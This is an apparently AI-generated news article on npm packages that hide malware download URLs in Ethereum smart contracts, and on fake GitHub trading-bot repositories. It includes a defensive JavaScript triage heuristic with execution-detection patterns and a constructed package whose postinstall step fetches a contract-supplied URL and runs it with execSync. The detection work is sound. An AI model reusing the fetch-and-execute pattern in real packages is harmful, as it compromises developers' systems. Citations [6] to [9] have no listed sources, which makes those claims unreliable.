Ethereum News Today: Hackers Hijack Ethereum Code to Mask Malware Supply Chain

Generated by AI Agent, Coin World
Thursday, Sep 4, 2025, 4:30 am ET

Summary

- Cybersecurity researchers discovered malicious npm packages using Ethereum smart contracts to hide C2 server URLs and deliver malware via blockchain queries.

- Packages like "colortoolsv2" bypassed detection by embedding infrastructure in smart contracts, triggering malware downloads when integrated into projects.

- The campaign extended to deceptive GitHub repositories posing as crypto trading bots, part of a "Stargazers Ghost Network" DaaS model using fake metrics.

- ReversingLabs reported at least 23 similar campaigns in 2024, urging developers to vet open-source code beyond popularity metrics and adopt tools like Spectra Assure.

Cybersecurity researchers have uncovered a sophisticated campaign leveraging smart contracts to deliver malware through compromised npm packages, marking a novel tactic in the evolving landscape of software supply chain attacks. The malicious packages, identified as "colortoolsv2" and "mimelib2," were published on the npm registry in July 2025 and swiftly removed after being flagged. These packages bypassed traditional detection mechanisms by embedding command-and-control (C2) server URLs within Ethereum smart contracts, a technique that obscures the malicious infrastructure from direct scrutiny within the package files themselves [1].

The malicious functionality of these packages is triggered when they are included in other projects, causing the packages to query the Ethereum blockchain for URLs to download the second-stage malware payload from an attacker-controlled server. This approach complicates detection efforts, because queries to public blockchain endpoints look like ordinary legitimate traffic and are not typically flagged by standard security tools [2]. Unlike conventional malware downloaders, which often include URLs or commands directly in package scripts, these packages retrieve that information from a smart contract, an innovative method of evading detection while maintaining operational stealth [3].
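As an added example (not code from the article or from ReversingLabs), the following static triage heuristic shows what a defender can look for in an npm package before installing it: an on-chain contract read whose result flows into a download and then into code execution. The two package contents are constructed, and ADDR, ABI and RPC_URL are placeholders.

```javascript
// Added example, not code from the article or from ReversingLabs: a static
// triage heuristic for an npm package that flags the pattern the article
// describes, a smart-contract read whose result is fetched and executed.
// Package contents below are constructed; ADDR, ABI and RPC_URL are placeholders.
const INDICATORS = {
  chainRead: /\b(eth_call|ethers\.Contract|web3\.eth\.Contract|JsonRpcProvider)\b/,
  fetch: /\b(fetch|https?\.get|axios\.get|got)\s*\(/,
  exec: /\b(eval|new\s+Function|child_process|execSync|spawn)\b/,
};

// files maps file name -> file contents, as read from an unpacked tarball.
function triagePackage(files) {
  const pkg = JSON.parse(files["package.json"] || "{}");
  // Lifecycle scripts run at install time, before the package is ever imported.
  const hasLifecycle = Object.keys(pkg.scripts || {}).some((k) => /^(pre|post)?install$/.test(k));
  const source = Object.entries(files)
    .filter(([name]) => name.endsWith(".js"))
    .map(([, body]) => body)
    .join("\n");
  const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(source));
  // Any single indicator is common in honest code; the chain read -> fetch -> exec
  // combination is what matches the campaign described above.
  const suspicious = ["chainRead", "fetch", "exec"].every((k) => hits.includes(k));
  return { hasLifecycle, hits, suspicious };
}

// Constructed benign package: reads on-chain data but never fetches or executes code.
const BENIGN = {
  "package.json": JSON.stringify({ name: "price-reader", scripts: { test: "node test.js" } }),
  "index.js": [
    'const { ethers } = require("ethers");',
    "const c = new ethers.Contract(ADDR, ABI, new ethers.JsonRpcProvider(RPC_URL));",
    "module.exports = () => c.price();",
  ].join("\n"),
};

// Constructed suspect package: a contract string is treated as a URL to fetch and run.
const SUSPECT = {
  "package.json": JSON.stringify({ name: "colortools-lookalike", scripts: { postinstall: "node index.js" } }),
  "index.js": [
    'const { ethers } = require("ethers");',
    'const { execSync } = require("child_process");',
    "const c = new ethers.Contract(ADDR, ABI, new ethers.JsonRpcProvider(RPC_URL));",
    "c.getString().then((u) => fetch(u)).then((r) => r.text()).then(execSync);",
  ].join("\n"),
};

console.log(triagePackage(BENIGN), triagePackage(SUSPECT));
```

A regex triage like this is a first filter, not a verdict; a hit on all three indicators is a reason to read the code by hand before adding the dependency.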

The broader campaign extends beyond npm packages to include a network of GitHub repositories that were designed to appear as credible cryptocurrency trading bots. These repositories featured fabricated activity, including numerous commits, fake user accounts, and artificial forks and stars to create the illusion of legitimacy and popularity. The repositories, such as "solana-trading-bot-v2," were structured to appear as open-source tools for automated on-chain trading. However, the underlying activity was deceptive, with malicious packages being included as dependencies through staged commits [4]. The repositories were found to be part of a distribution-as-a-service (DaaS) model known as the "Stargazers Ghost Network," which relies on sockpuppet accounts to inflate metrics and deceive developers [5].

The threat actors behind this campaign are part of a larger trend of software supply chain attacks targeting cryptocurrency developers. According to ReversingLabs' 2025 Software Supply Chain Security report, at least 23 similar campaigns were observed in 2024, including an incident where the PyPI package "ultralytics" was compromised to deliver a cryptocurrency miner. These attacks highlight a growing sophistication in the tactics used by threat actors, who are increasingly leveraging both blockchain and open-source infrastructure to distribute malware [6]. The use of Ethereum smart contracts in this context demonstrates a new level of complexity and adaptability in threat actors’ strategies to evade traditional cybersecurity defenses [7].

ReversingLabs researchers emphasize the importance of rigorous vetting by developers when incorporating open-source libraries into their projects. This includes scrutinizing not only the number of stars, commits, or maintainers associated with a package but also the credibility of the developers behind it. Developers are urged to examine the codebase thoroughly and assess the package’s purpose and behavior beyond surface-level indicators of popularity. The firm has also released tools such as the Spectra Assure Community platform to assist in the triage of open-source packages and reduce the risk of malicious code infiltration [8].

The discovery of these malicious packages underscores the need for stronger security practices within the cryptocurrency and open-source development ecosystems. As attackers continue to refine their methods, the line between legitimate and malicious tools becomes increasingly blurred, requiring heightened vigilance and proactive defenses to mitigate the risks posed by evolving threats [9].

Sources:

- [1] Ethereum Contracts Used to Load Malicious Code: https://www.reversinglabs.com/blog/ethereum-contracts-malicious-code
- [2] Malicious npm Packages Exploit Ethereum Smart Contracts: https://thehackernews.com/2025/09/malicious-npm-packages-exploit-ethereum.html
- [3] Malicious npm Packages Exploit Ethereum Smart Contracts: https://www.infosecurity-magazine.com/news/malicious-npm-packages-exploit/
- [4] Malicious npm packages use Ethereum blockchain for malware delivery: https://www.csoonline.com/article/4050956/malicious-npm-packages-use-ethereum-blockchain-for-malware-delivery.html
- [5] Hackers find new way to hide malware in Ethereum smart contracts: https://www.coinglass.com/ru/news/688314